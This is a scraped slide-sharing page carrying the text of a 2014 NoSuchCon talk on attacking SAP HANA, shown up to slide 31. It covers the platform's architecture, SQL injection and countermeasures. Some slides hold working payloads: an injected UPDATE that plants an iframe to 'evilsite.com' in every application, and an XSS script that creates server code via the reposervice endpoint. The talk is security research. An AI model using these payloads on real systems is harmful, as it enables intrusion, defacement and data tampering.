Submit Search
Upload
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
•
1 like
•
528 views
N
NoSuchCon
Follow
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
Read less
Read more
Technology
Report
Share
Report
Share
1 of 49
Download now
Download to read offline
Recommended
SSL Configuration within SAP HANA
SSL Configuration within SAP HANA
Debajit Banerjee
0101 foundation - detailed view of hana architecture
0101 foundation - detailed view of hana architecture
Ramakrishna Donepudi
CV_Jyosthna_SAP BASIS
CV_Jyosthna_SAP BASIS
JYOSTHNA
SAP HANA Online Training/ SAP HANA Interview Questions
SAP HANA Online Training/ SAP HANA Interview Questions
Globustrainings
E commerce multi-canal sqli
E commerce multi-canal sqli
BY_CONNECT
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NoSuchCon
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NoSuchCon
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NoSuchCon
Recommended
SSL Configuration within SAP HANA
SSL Configuration within SAP HANA
Debajit Banerjee
0101 foundation - detailed view of hana architecture
0101 foundation - detailed view of hana architecture
Ramakrishna Donepudi
CV_Jyosthna_SAP BASIS
CV_Jyosthna_SAP BASIS
JYOSTHNA
SAP HANA Online Training/ SAP HANA Interview Questions
SAP HANA Online Training/ SAP HANA Interview Questions
Globustrainings
E commerce multi-canal sqli
E commerce multi-canal sqli
BY_CONNECT
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NoSuchCon
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NoSuchCon
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NoSuchCon
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NoSuchCon
NSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NoSuchCon
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NoSuchCon
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NoSuchCon
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NoSuchCon
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NoSuchCon
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NoSuchCon
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NoSuchCon
NSC #2 - Challenge Introduction
NSC #2 - Challenge Introduction
NoSuchCon
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NoSuchCon
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NoSuchCon
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NoSuchCon
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
Onapsis Inc.
SAP Business Objects Attacks
SAP Business Objects Attacks
Onapsis Inc.
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
Onapsis Inc.
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis Inc.
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Onapsis Inc.
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Onapsis Inc.
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Onapsis Inc.
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI Frameworks
Onapsis Inc.
Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2
Datameer
More Related Content
Viewers also liked
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NoSuchCon
NSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NoSuchCon
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NoSuchCon
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NoSuchCon
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NoSuchCon
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NoSuchCon
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NoSuchCon
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NoSuchCon
NSC #2 - Challenge Introduction
NSC #2 - Challenge Introduction
NoSuchCon
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NoSuchCon
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NoSuchCon
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NoSuchCon
Viewers also liked
(13)
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - Challenge Introduction
NSC #2 - Challenge Introduction
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
Similar to NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
Onapsis Inc.
SAP Business Objects Attacks
SAP Business Objects Attacks
Onapsis Inc.
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
Onapsis Inc.
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis Inc.
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Onapsis Inc.
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Onapsis Inc.
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Onapsis Inc.
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI Frameworks
Onapsis Inc.
Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2
Datameer
Onapsis SAP Backdoors
Onapsis SAP Backdoors
Onapsis Inc.
AdminCamp 2018 - ApplicationInsights für Administratoren
AdminCamp 2018 - ApplicationInsights für Administratoren
Christoph Adler
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
Onapsis Inc.
Attacks Based on Security Configurations
Attacks Based on Security Configurations
Onapsis Inc.
18BC03_Discovery_Enables_Accurate_CMDB_Hinkle_DiscoverFinancial
18BC03_Discovery_Enables_Accurate_CMDB_Hinkle_DiscoverFinancial
Tim Hinkle
Pen Testing SAP Critical Information Exposed
Pen Testing SAP Critical Information Exposed
Onapsis Inc.
Introduction to NEW SAP - Accenture Technology Meetup
Introduction to NEW SAP - Accenture Technology Meetup
Accenture Hungary
Sap fundamentals overview_for_sap_minors
Sap fundamentals overview_for_sap_minors
Cenk Ersoy
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Onapsis Inc.
Storage Sizing for SAP
Storage Sizing for SAP
Cenk Ersoy
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
Onapsis Inc.
Similar to NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
(20)
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
SAP Business Objects Attacks
SAP Business Objects Attacks
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI Frameworks
Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2
Onapsis SAP Backdoors
Onapsis SAP Backdoors
AdminCamp 2018 - ApplicationInsights für Administratoren
AdminCamp 2018 - ApplicationInsights für Administratoren
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
Attacks Based on Security Configurations
Attacks Based on Security Configurations
18BC03_Discovery_Enables_Accurate_CMDB_Hinkle_DiscoverFinancial
18BC03_Discovery_Enables_Accurate_CMDB_Hinkle_DiscoverFinancial
Pen Testing SAP Critical Information Exposed
Pen Testing SAP Critical Information Exposed
Introduction to NEW SAP - Accenture Technology Meetup
Introduction to NEW SAP - Accenture Technology Meetup
Sap fundamentals overview_for_sap_minors
Sap fundamentals overview_for_sap_minors
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Storage Sizing for SAP
Storage Sizing for SAP
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
Recently uploaded
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
Radu Cotescu
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
The Digital Insurer
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
wesley chun
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
Khem
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Edi Saputra
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
Recently uploaded
(20)
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
1.
CONFIDENTIAL NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 1 11/20/14 1 Ezequiel Gutesman Blended Web and Database Attacks on Real-time, In-Memory Platforms
2.
3NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 3 Agenda In-Memory Platforms HANA and the blended architecture Threat vectors for SAP HANA SQLi XSS and XSJS Rserve integration C/C++ post exploitation Conclusions
3.
4In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 4NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 4 In-Memory Platforms/IMDB
4.
5NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 5 • Simple concept – DBMS that primarily relies on main memory for computer data storage. – “It has been predicted that in-memory computing will be one of the Top 10 technologies of 2012” (Gartner) – Why didn’t it happen before? In-Memory Computing/IMDB
5.
6In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 6NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 6 • Cost of physical memory going down • Increasing amount of data being processed • Higher requirements on system response • Innovation! – RT analytics Reasons
6.
7In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 7NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 7 • “It’s orders-of-magnitude faster—like the difference between walking and flying in a plane” J. Loaiza, Oracle • "In my 20 years in SAP I have never seen such innovation." Rob Enslin, Head of Sales – SAP Main vendors • Oracle - Oracle 12c • Microsoft - MS SQL Server 2014 (Hekaton) • SAP - SAP HANA Some quotes and examples of what this really means…
7.
8In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 8NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 8 Motivation Is it the cause That costed us the world cup??
8.
9In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 9NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 9 SAP, SAP HANA and the blended architecture
9.
10NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 10
10.
11NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 11 What is SAP? Largest provider of business management solutions in the world. ● More than 250.000 implementations around the globe. ● More than 60.000 employees. Used by Global Fortune-1000 companies, governmental organizations and defense agencies to run their every-day business processes. ● Such as Revenue / Production / Expenditure business cycles. SALES PRODUCTION FINANCIAL PLANNING INVOICING PROCUREMENT TREASURY LOGISTICS PAYROLL BILLING
11.
12NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 12 What is SAP? Largest provider of business management solutions in the world. ● More than 250.000 implementations around the globe. ● More than 60.000 employees. Used by Global Fortune-1000 companies, governmental organizations and defense agencies to run their every-day business processes. ● Such as Revenue / Production / Expenditure business cycles. SALES PRODUCTION FINANCIAL PLANNING INVOICING PROCUREMENT TREASURY LOGISTICS PAYROLL BILLING HANA is SAP’s star product… new customers and existing customers will be pushed towards implementing HANA (both as back-end DB and application engine + DB)
12.
13NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 13 A Business-Critical Infrastructure ● SAP and HANA systems store and process the most critical business information in the Organization. ● If these platforms are breached, an intruder would be able to perform different attacks such as: ESPIONAGE: Obtain customers/vendors/human resources data, financial planning information, balances, profits, sales information, manufacturing recipes, Stats & BI, etc. SABOTAGE: Paralyze the operation of the organization by shutting down the Applications running on HANA, disrupting interfaces with other systems and deleting critical information, etc. FRAUD: Modify financial information, tamper sales and purchase orders, create new vendors, modify vendor bank account numbers, etc.
13.
14In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 14NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 14 © 2014 SAP AG or an SAP affiliate company. All rights reserved. • Full In-memory database • Integrated HTTP Server • Support for cloud implementations • Integrations with calc engines (R, SQL) • Diverse set of deployment options • Massive memory requirements • Used mainly for Business Applications SAP HANA
14.
15In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 15NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 15 Attack Surface http://help.sap.com/saphelp_hanaplatform/helpdata/en/37/d2573cb24e4d75a23e8577fb4f73b7/content.htm • SQL/MDX port • HTTP service • SAP Host Agent and MC • Outgoing connections • Service Marketplace • Solution Manager • Mail servers • Other Web Serves • R servers • SAP Support
15.
16In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 16NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 16 Typical web application scenario Typical web frameworks (asp, .NET, php, Django,…) use a DB connection configured with a single, sometimes full-privileged user. On this scenario you will have: • Application Level users • Database user • OS user to run HTTP server and DB server A blended architecture
16.
17In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 17NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 17 SAP HANA web application scenario SAP HANA Web applications framework works differently. The application user is the same as the DB user. User privileges should be restricted at the DB level → The attack surface should be restricted per user. This requires: • Web Application/Database user • OS User running the DB (<dbsid>adm) A blended architecture
17.
18In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 18NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 18 Typical webapps • SQLi could access the whole database • XSS is typically restricted • Code stored on the Filesystem • OS commands can be executed SAP HANA webapps • SQLi are restricted to the user privileges • XSS is more powerful by default • Code stored on the Database • Restricted OS comm. execution Impact of vulnerabilities
18.
19In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 19NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 19 Programming Languages: • XSJS or XS Javascript. This is HANA’s version of Server Side Javascript. It is based on the SpiderMonkey Javascript engine. API’s and libraries are detailed in the HANA doc • Within the database, SQL and SQLscript used to access the info • R code / (L code for internal use). • ABAP is also tuned to run faster on HANA systems • HTML5 for mobile apps • C/C++ SAP HANA Concepts
19.
20In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 20NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 20 HANA Studio: It is a full DB client that can be used to administrate the database XS IDE: A developer can create code to be deployed on the web server using the XS IDE available through the HTTP/s interface. http://hanaserver:8000/sap/hana/xs/ide/editor SAP HANA Concepts Development Environment
20.
21In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 21NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 21 Attack vectors on SAP HANA
21.
22In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 22NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 22 sqli.xsjs Because of HANA architecture, the queries are executed in the context of the user logged into the web application. var conn = $.db.getConnection(); var pstmt = conn.prepareStatement( "SELECT * FROM accounts WHERE custID='" + $.request.parameters.get("id")); var rs = pstmt.executeQuery(); sqli.php In most of the web application frameworks, the unique credentials are hardcoded into the application code or configuration. $conn = pg_connect("host=localhost port=5432 user=postgres password=123"); $query = "SELECT * FROM accounts WHERE custID=’$id’"; $result = pg_query($conn, $query); SQL Injection on HANA
22.
23In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 23NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 23 sqli.xsjs Because of HANA architecture, the queries are executed in the context of the user logged into the web application. var conn = $.db.getConnection(); var pstmt = conn.prepareStatement( "SELECT * FROM accounts WHERE custID='" + $.request.parameters.get("id")); var rs = pstmt.executeQuery(); sqli.php In most of the web application frameworks, the unique credentials are hardcoded into the application code or configuration. $conn = pg_connect("host=localhost port=5432 user=postgres password=123"); $query = "SELECT * FROM accounts WHERE custID=’$id’"; $result = pg_query($conn, $query); SQL Injection on HANA It’s not only about WHAT is executed but more important about WHO executes it… so SQL injection attacks can be blended with Social Engineering to make the attacks more successful
23.
24In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 24NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 24 UPDATE _SYS_REPO.ACTIVE_OBJECT set CDATA=’$.response.addBody("<iframe src=’http://www.evilsite.com’ height=0 width=0></iframe>")’ where OBJECT_SUFFIX='html' Well... it's a mix UPDATE _SYS_REPO.ACTIVE_OBJECT set CDATA=’$.response.addBody("PWNED")’ where OBJECT_NAME = 'demo' Example 1: deface http://[ip]/demo/democode/demo.xsjs with “PWNED”: Example 2: inject an attacker-controlled iframe in EVERY SINGLE APPLICATION: PKG SUBPKG OBJ Predictable by application path! iif the targeted user has write privileges over _SYS_REPO.ACTIVE_OBJECT
24.
25In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 25NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 25 Time-travel SQL Injection
25.
26In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 26NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 26 SAP HANA HISTORY Tables Reference : http://saphanatutorial.com/sap-hana-history-table/ SAP HANA Historical tables support time travel queries. These are performed against historical states of the database. So unless the user specifically deletes the historical data on the table, the information will remain there. History TABLES and SQL injections
26.
27In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 27NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 27 • Create a HISTORY table – CREATE HISTORY COLUMN TABLE NAME (…); • List HISTORY tables – SELECT * FROM SYS.TABLES WHERE SESSION_TYPE = 'HISTORY'; • Access the HISTORY information – SELECT * FROM TABLE AS OF COMMIT ID XXXX; //may not work :S – SELECT * FROM TABLE WITH PARAMETERS ('REQUEST_FLAGS'= ('ALLROWS')) • Delete the HISTORY information – MERGE HISTORY DELTA of TABLE; History TABLES and SQL injection
27.
28In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 28NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 28 DEMO SQL injection on HISTORY tables
28.
29In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 29NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 29 • Use prepareStatement within the XSJS code • Never concatenate user input to a query string if it was not validated - :P • Restrict the privileges of all users, so they can access only the information (and tables) they need. • Consider whether you REALLY need a HISTORY table Countermeasures on SQLi
29.
30In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 30NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 30 XSS and derived threats
30.
31In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 31NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 31 XSS attacks are extremely powerful with the built-in functionality of the In-Memory platform: meet the reposervice! <script> var xsjs_payload = "var conn=$.db.getConnection(); var pstmt=conn.prepareStatement('<INSERT UPDATE QUERY OR ANY OTHER QUERY>'); var rs = pstmt.executeQuery();"; attack(); function attack(){ $.ajax({ url: "/sap/hana/xs/ide/editor/server/repo/reposervice.xsjs?activate=false&mode=create&path=[path to create the page]", data: xsjs_payload, type: "PUT", dataType: "text", contentType: "text/plain", processData: false, headers: { "X-CSRF-Token": securityToken }, });} </script> Cross Site Scripting Get this from a request in the payload
31.
32In-Memory platforms www.onapsis.com
